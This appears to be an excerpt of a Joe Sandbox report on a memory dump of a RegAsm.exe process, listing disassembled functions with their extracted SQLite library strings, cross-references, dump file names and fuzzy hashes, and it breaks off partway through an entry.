SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0), xrefs: 19C42DA4
NULL, xrefs: 19C42E38
misuse, xrefs: 19C42E73
unopened, xrefs: 19C42E55
WHERE name=%Q, xrefs: 19C42DB7

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: ORDER BY name$%s at line %d of [%.10s]$API call with %s database connection pointer$NULL$SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0)$WHERE name=%Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
API String ID: 0-1179878930
Opcode ID: 4bebab817c8a4b6bd48fa203c62601d26bb496567a5f5dd09a13cf7c902ee4e9
Instruction ID: fc0fe590d2c3781280c0335557db4c5a6a70e478fb8ac86de36bd5306623272b
Opcode Fuzzy Hash: 4bebab817c8a4b6bd48fa203c62601d26bb496567a5f5dd09a13cf7c902ee4e9
Instruction Fuzzy Hash: 02C16872B043509BE701CF24EC46B5777A6AF40395F6C8428ECD99B382E735E945C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 19D45D70 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 266COMMON

Download Yara Rule

Strings

pgsz, xrefs: 19D45D81
secure-delete, xrefs: 19D46031
hashsize, xrefs: 19D45DF0
usermerge, xrefs: 19D45EAD
crisismerge, xrefs: 19D45EF7
deletemerge, xrefs: 19D45F64
automerge, xrefs: 19D45E59
rank, xrefs: 19D45FBB

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: automerge$crisismerge$deletemerge$hashsize$pgsz$rank$secure-delete$usermerge
API String ID: 0-3330941169
Opcode ID: bb9251e60560b4487102f9377ad44a13eb4d8d47f596eaf49d79dbcb75a5dd6e
Instruction ID: 66e1a8f63e06849dcc2b5037024fd838ad291aa946ef9071d45d26c351083604
Opcode Fuzzy Hash: bb9251e60560b4487102f9377ad44a13eb4d8d47f596eaf49d79dbcb75a5dd6e
Instruction Fuzzy Hash: 1D7126BAB003115BC704DE59FC0198E77D4AF85212F6C0879F946C7E91FB21E95A87A3

Uniqueness

Uniqueness Score: -1.00%

Function 19C35E20 Relevance: 26.7, APIs: 8, Strings: 7, Instructions: 496COMMON

Download Yara Rule

Strings

SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id', xrefs: 19C35E6F
%s at line %d of [%.10s], xrefs: 19C35F3A, 19C36262, 19C36394
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C35F2B, 19C36253, 19C36385
recursive definition for %s.%s, xrefs: 19C35E4C
API called with finalized prepared statement, xrefs: 19C35F1F, 19C36247, 19C36379
misuse, xrefs: 19C35F35, 19C3625D, 19C3638F
no such fts5 table: %s.%s, xrefs: 19C362EA

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id'$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such fts5 table: %s.%s$recursive definition for %s.%s
API String ID: 0-1070437968
Opcode ID: def0a2eeadd464faa7043d74715b487522437cb16dbfa398a20b484cfc60cfe0
Instruction ID: dddbe12bc10febf2fedf6685be7b348a0d426e349c398997f47a043d3e45b999
Opcode Fuzzy Hash: def0a2eeadd464faa7043d74715b487522437cb16dbfa398a20b484cfc60cfe0
Instruction Fuzzy Hash: 670215B19043419BD701DF25ED86B5B77E8BF44316F8C4528E8C997382EB75E604CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19CA9980 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 429COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19CA9A44, 19CA9D9F
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19CA9A35, 19CA9D90
SELECT %s, xrefs: 19CA99B1
API called with finalized prepared statement, xrefs: 19CA9A19, 19CA9D84
no such function: %s, xrefs: 19CA9E8C
misuse, xrefs: 19CA9A3F, 19CA9D9A
API called with NULL prepared statement, xrefs: 19CA9A04

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such function: %s
API String ID: 0-3900766660
Opcode ID: c8ade499c56b3e3a539cdb19765af6962df48cbbef0cfbdf3aff82ac16cbb867
Instruction ID: 12e91ebcd0f530d10483fdd89665f5be00f56ed1ddfdbffebf3782f9c62d042d
Opcode Fuzzy Hash: c8ade499c56b3e3a539cdb19765af6962df48cbbef0cfbdf3aff82ac16cbb867
Instruction Fuzzy Hash: 6BE115B99047429BD710CF25E886B9B77E4AF84354F1C452CE8C99B382FB35E845C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 19C63800 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 184COMMON

Download Yara Rule

Strings

cannot open value of type %s, xrefs: 19C638ED
real, xrefs: 19C63895, 19C638EC
%s at line %d of [%.10s], xrefs: 19C6393F
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C63930
integer, xrefs: 19C6389A
null, xrefs: 19C638E7
API called with finalized prepared statement, xrefs: 19C63924
misuse, xrefs: 19C6393A
no such rowid: %lld, xrefs: 19C639F8

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$cannot open value of type %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$integer$misuse$no such rowid: %lld$null$real
API String ID: 0-1477268580
Opcode ID: c4f3b7565bb164687b766cbe3a6745d049eb7b71eddd3d19e1209271ebb4be5e
Instruction ID: 9dcfdd1add971b54ece9daef0e0b98e3c1c4f0543544a4ac23427b34807ec475
Opcode Fuzzy Hash: c4f3b7565bb164687b766cbe3a6745d049eb7b71eddd3d19e1209271ebb4be5e
Instruction Fuzzy Hash: 9651F1B56043019FD714DF28EC80A66B7B4FF85315F0C492DE9868B792DB71E814CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 19D4A150 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 226COMMON

Download Yara Rule

Strings

segid, term, pgno, PRIMARY KEY(segid, term), xrefs: 19D4A1FB
%s_data, xrefs: 19D4A1BC
data, xrefs: 19D4A1E4
id INTEGER PRIMARY KEY, block BLOB, xrefs: 19D4A1DF
idx, xrefs: 19D4A200

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s_data$data$id INTEGER PRIMARY KEY, block BLOB$idx$segid, term, pgno, PRIMARY KEY(segid, term)
API String ID: 0-1009905541
Opcode ID: da18562bb6c3c7d229f4a7c2b55a09cb4546b5f9ac3ac62f61dc44d244c4dee5
Instruction ID: 95b59b29f34bc380b18f9b1eb3764873e49b5259106bf1662a3e97b0b5c76e1b
Opcode Fuzzy Hash: da18562bb6c3c7d229f4a7c2b55a09cb4546b5f9ac3ac62f61dc44d244c4dee5
Instruction Fuzzy Hash: 9971BDB5900260DBD702AF74DD8CB0B77ACAF14345F185424F84AD7A91EB36E914DBA3

Uniqueness

Uniqueness Score: -1.00%

Function 19D4F370 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 196COMMON

Download Yara Rule

Strings

content, xrefs: 19D4F49D
id INTEGER PRIMARY KEY, sz BLOB, xrefs: 19D4F524, 19D4F52C
docsize, xrefs: 19D4F52D
id INTEGER PRIMARY KEY, xrefs: 19D4F43E
id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER, xrefs: 19D4F51C
, c%d, xrefs: 19D4F469
k PRIMARY KEY, v, xrefs: 19D4F544
config, xrefs: 19D4F549
version, xrefs: 19D4F560

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: , c%d$config$content$docsize$id INTEGER PRIMARY KEY$id INTEGER PRIMARY KEY, sz BLOB$id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER$k PRIMARY KEY, v$version
API String ID: 0-3918257174
Opcode ID: caed907e04628bab3baec02691be3c89b12edd960bf75f8b3094fe30a9a08968
Instruction ID: 3d15999372649927919b8c7d464b382843b46e510cbe0053a23d6049c6708dc1
Opcode Fuzzy Hash: caed907e04628bab3baec02691be3c89b12edd960bf75f8b3094fe30a9a08968
Instruction Fuzzy Hash: 13514671900211DBC700AF28DC48B5B77A8EF84761F5C4564EC899BA91D736EA05CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 19D68F40 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 177COMMON

Download Yara Rule

Strings

NULL, xrefs: 19D69148
NULL, xrefs: 19D6912E
%lld, xrefs: 19D6900C
%!.15g, xrefs: 19D68F83
%!.20e, xrefs: 19D68FF1

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %!.15g$%!.20e$%lld$NULL$NULL
API String ID: 0-2115304644
Opcode ID: 0d8d67c55c5e2ad46c8eb01c2110e2073f09938032e2584e7bdacdee4bee096f
Instruction ID: 460e4e2036cbfea572166aa9a3f35b0013fd3a9761dd8f38dde0c4e113fa0b05
Opcode Fuzzy Hash: 0d8d67c55c5e2ad46c8eb01c2110e2073f09938032e2584e7bdacdee4bee096f
Instruction Fuzzy Hash: FF5165799047106BD700DF18CC41AEBB7A4EF81304F4C895DF8D967A62E73AE649C3A2

Uniqueness

Uniqueness Score: -1.00%

Function 19C33420 Relevance: 21.4, APIs: 6, Strings: 6, Instructions: 392COMMON

Download Yara Rule

Strings

ATTACH x AS %Q, xrefs: 19C3346F
%s at line %d of [%.10s], xrefs: 19C33557, 19C335A3
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C33548, 19C33594
API called with finalized prepared statement, xrefs: 19C3352C, 19C33588
misuse, xrefs: 19C33552, 19C3359E
API called with NULL prepared statement, xrefs: 19C33517

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-2988319395
Opcode ID: 2534887d88cc5d8ae4c61a32146ac8db26b2a49c45dcd2b6b020f6b67d7c392b
Instruction ID: 6932b4b22fe10a985f04ccd8dde1abd6f1ed0da232ca32235e9bf1d859820385
Opcode Fuzzy Hash: 2534887d88cc5d8ae4c61a32146ac8db26b2a49c45dcd2b6b020f6b67d7c392b
Instruction Fuzzy Hash: 18D1D3B19043419BD7119F24EC89B5B7BE8BF44356FC88528E8C9D7381EB35E644CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19CBEF60 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

,origin, xrefs: 19CBF0D6, 19CBF0DE

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: ,origin
API String ID: 0-4198660907
Opcode ID: 35ed629453a8c4798a6a7e632676a2d6d533f28e90df866d9771b8a3c16fff7b
Instruction ID: c5c0de377af8b8aa812fa21eba33f661a3839a60ced7495efbb6afeb1bcb6f39
Opcode Fuzzy Hash: 35ed629453a8c4798a6a7e632676a2d6d533f28e90df866d9771b8a3c16fff7b
Instruction Fuzzy Hash: D3719075804301DFD711AF69E88591BB7A9FF94740F98492CE9CA8B660DB33E850CB52

Uniqueness

Uniqueness Score: -1.00%

Function 19D04B10 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 156COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19D04C39
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D04C2A
rtree constraint failed: %s.(%s<=%s), xrefs: 19D04BF9
SELECT * FROM %Q.%Q, xrefs: 19D04B25
API called with finalized prepared statement, xrefs: 19D04C1E
misuse, xrefs: 19D04C34
UNIQUE constraint failed: %s.%s, xrefs: 19D04BC9

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT * FROM %Q.%Q$UNIQUE constraint failed: %s.%s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$rtree constraint failed: %s.(%s<=%s)
API String ID: 0-2013246442
Opcode ID: df279fed2d00781566ec4a9373d156d6a6f4a21803d670906b2750f4945e5881
Instruction ID: 57e87a27582de9a76e5c970a0c862cb72647a947a1a52be704add5f4ae5140d0
Opcode Fuzzy Hash: df279fed2d00781566ec4a9373d156d6a6f4a21803d670906b2750f4945e5881
Instruction Fuzzy Hash: AF412671904254AFE701AF65EC88F9B37ACEF41A44F0C4528FD49D6681FB21A950C6B6

Uniqueness

Uniqueness Score: -1.00%

Function 19DB7C10 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 150COMMON

Download Yara Rule

Strings

winFullPathname1, xrefs: 19DB7CC9
%s%c%s, xrefs: 19DB7C7A
winFullPathname2, xrefs: 19DB7D35

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s%c%s$winFullPathname1$winFullPathname2
API String ID: 0-2846052723
Opcode ID: 9affc851560ffaeb00f250157271a211c85ccd3a8d8d369cf0e50c6aeed83905
Instruction ID: 8988af46a4781ca28454b039655d020dd04d5d4f8bb14e52f156c8d4df89e723
Opcode Fuzzy Hash: 9affc851560ffaeb00f250157271a211c85ccd3a8d8d369cf0e50c6aeed83905
Instruction Fuzzy Hash: 1541BDA5A043502BE3119A30FC85F7B3B9AAF43614F4E802CF4CB5D9C1EA12E842C362

Uniqueness

Uniqueness Score: -1.00%

Function 19DAAAD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 130COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19DAAB1A, 19DAAB5B, 19DAABAF
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19DAAB0B, 19DAAB4C, 19DAABA0
bind on a busy prepared statement: [%s], xrefs: 19DAAB94
API called with finalized prepared statement, xrefs: 19DAAAEF
misuse, xrefs: 19DAAB15, 19DAAB56, 19DAABAA
API called with NULL prepared statement, xrefs: 19DAAAD9

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
